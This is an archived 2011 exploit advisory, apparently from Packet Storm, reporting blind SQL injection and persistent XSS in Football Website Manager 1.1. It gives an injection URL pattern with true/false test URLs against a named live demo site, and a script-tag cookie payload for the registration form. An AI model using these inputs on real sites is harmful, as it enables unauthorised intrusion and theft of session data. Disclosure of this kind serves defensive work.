exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Football Website Manager 1.1 Cross Site Scripting / SQL Injection

Football Website Manager 1.1 Cross Site Scripting / SQL Injection
Posted Apr 26, 2011
Authored by RoAd_KiLlEr

Football Website Manager version 1.1 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | af3d7d3f9f8b8a2fa33915f2eee90058f00c76ed14b648348f48164e7ee9ad87

Football Website Manager 1.1 Cross Site Scripting / SQL Injection

Change Mirror Download
=========================================================================
Football Website Manager PHP Script BSQL-i / Persistent XSS Vulnerability
==========================================================================

+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
+=+=+= +=+=+=
+=+=+= /\ | | | | ________ _____ _____ __ _ __ +=+=+=
+=+=+= / \ | |__| | _____ / ______/ | _ \ | ____|\ \ / \ / / +=+=+=
+=+=+= / /\ \| |__| | /_____/ | | | |_) / | |__ \ \/ \/ / +=+=+=
+=+=+= / ____ \ | | | | |_______ | __\ \ | __| \ / +=+=+=
+=+=+= /_/ \_\| | | |________/ |_| \_\ | |_______\_____/_____ +=+=+=
+=+=+= |_____________________|+=+=+=
+=+=+= +=+=+=
+=+=+= X-n3t - **RoAd_KiLlEr** - The|Denny` - The_1nv1s1bl3 +=+=+=
+=+=+= +=+=+=
+=+=+= 0ne Nation , 0ne People , 0ne Culture , 0ne Language = Ethnic Albania +=+=+=
+=+=+= +=+=+=
+=+=+= ....::: | ALBANIAN HACKING CREW | :::.... 2011 +=+=+=
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
0 0
1 ########################################### 1
0 I'm **RoAd_KiLlEr** member from 1337 DAY Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+]Title :.......Football Website Manager PHP Script BSQL-i / Persistent XSS Vulnerability
[+]Author :......**RoAd_KiLlEr**
[+]Tested on :...Win Xp Sp 2/3 | Apache 2.0.64 | PHP: 5.3.5
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: sukihack[at]gmail[dot]com
[~] Home: http://1337day.com/author/2447
[~] Vendor: http://www.nil.clan-hosts.net/cycsoftware/index.php
[~] Download CMS:http://www.nil.clan-hosts.net/cycsoftware/modules.php?op=modload&name=Downloads&file=index&req=getit&lid=2
[~] Version: 1.1
[~] License: GNU GPL


==========ExPl0iT3d by **RoAd_KiLlEr**==========






[+] Description:


Football Website Manager is a PHP script that allows you to create a website for a football (soccer) team in order to keep track of team info and league matches. It is menu driven so no HTML or programing knowledge is required.

It allows you to add teams in your division, add players to your squad, assign roles to each member (player, manager etc) add fixtures, then add results for your matches as well as other teams to keep the league table up to date.

You can also post news stories to the main page, assign rights to other players to post news or give them full access.



========================================




[ I ]. BSQL-i Vulnerability
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+






[P0C]: http://127.0.0.1/profile.php?fileId=[BLIND SQL INJECTION]




[L!v3 D3m0]:

http://www.nil.clan-hosts.net/fbdemo/profile.php?fileId=-113 <== FALSE :P

http://www.nil.clan-hosts.net/fbdemo/profile.php?fileId=113 <== TRUE :D





[ II ]. Persistent XSS Vulnerability
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


Persitent XSS egzists in the members area.
First go to any site,than click register http://127.0.0.1/register.php
In the area of your Username and Full Name write the javascript :D..

[At4ck Patt3rn]: "><script>alert(document.cookie)</script>



Than when you go to view your profile the script executes.




[+] TIME TABLE:

26 April 2011 - Vulnerability discovered.
26 April 2011 - Vendor Notified.
27 April 2011 - Advisory released.


===========================================================================================
[!] Albanian Hacking Crew
===========================================================================================
[!] **RoAd_KiLlEr**
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | The|DennY` | THE_1NV1S1BL3 | KHG & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks: r0073r | indoushka | Sid3^effects | DoNnY | All 1337day Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close